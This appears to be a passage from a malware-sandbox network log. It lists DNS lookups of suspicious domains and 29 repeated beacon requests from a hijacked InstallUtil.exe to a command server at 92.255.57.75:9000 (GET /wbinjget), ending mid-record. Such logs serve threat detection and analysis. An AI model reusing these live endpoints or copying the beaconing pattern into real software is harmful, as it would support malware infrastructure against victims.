Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:24.222639084 CET	1.1.1.1	192.168.2.11	0x6540	No error (0)	csp-invoices-v5.com		83.166.133.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:25.474659920 CET	1.1.1.1	192.168.2.11	0x1db6	No error (0)	cndef1.green-pathways.shop		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:25.474659920 CET	1.1.1.1	192.168.2.11	0x1db6	No error (0)	cndef1.green-pathways.shop		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:36.097820044 CET	1.1.1.1	192.168.2.11	0xb4a6	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:36.097820044 CET	1.1.1.1	192.168.2.11	0xb4a6	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:38.764566898 CET	1.1.1.1	192.168.2.11	0xe219	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:38:51.686048031 CET	1.1.1.1	192.168.2.11	0x3fd8	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:39:04.209415913 CET	1.1.1.1	192.168.2.11	0x4a3d	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:39:28.434134960 CET	1.1.1.1	192.168.2.11	0x36aa	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:39:52.530128002 CET	1.1.1.1	192.168.2.11	0x99aa	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:40:16.615398884 CET	1.1.1.1	192.168.2.11	0x73a2	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:40:40.967201948 CET	1.1.1.1	192.168.2.11	0x1e34	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49808	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:38:53.842899084 CET	110	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000 Connection: Keep-Alive
Dec 17, 2024 08:38:55.162933111 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:38:53 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49814	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:38:55.388329029 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:38:56.713579893 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:38:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49819	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:38:56.953349113 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:38:58.279609919 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:38:57 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49821	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:38:58.563385963 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:38:59.913219929 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:38:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49827	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:00.153729916 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:01.478362083 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:01 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49832	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:01.714332104 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:03.050635099 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49838	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:03.279444933 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:04.616170883 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:04 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49840	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:04.872379065 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:06.196259975 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:05 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49846	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:06.443815947 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:07.763425112 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:07 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49851	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:08.010777950 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:09.343115091 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49853	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:09.575890064 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:10.900127888 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:10 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49859	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:11.122909069 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:12.445579052 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:12 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49864	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:12.670330048 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:13.998016119 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:13 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49866	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:14.231184006 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:15.559474945 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49872	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:16.168890953 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:17.497010946 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:17 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49879	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:17.736926079 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:19.063741922 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:18 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.11	49880	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:19.294357061 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:20.620064974 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.11	49886	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:20.857188940 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:22.182455063 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:21 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.11	49892	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:22.419912100 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:23.745795012 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:23 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.11	49898	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:23.982460976 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:25.308207989 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:25 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.11	49899	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:25.545296907 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:26.870191097 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:26 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.11	49905	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:27.262222052 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:28.586435080 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:28 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.11	49911	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:28.811913967 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:30.149481058 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:29 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.11	49917	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:30.373011112 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:31.696568966 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:31 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.11	49918	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:31.934379101 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:33.322936058 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:33 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.11	49924	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:33.559783936 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:34.883574009 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:34 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.11	49930	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:35.109227896 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:36.443996906 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:35 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.11	49931	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:36.669339895 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:38.001491070 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:37 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.11	49937	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:38.261538029 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:39.587831020 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
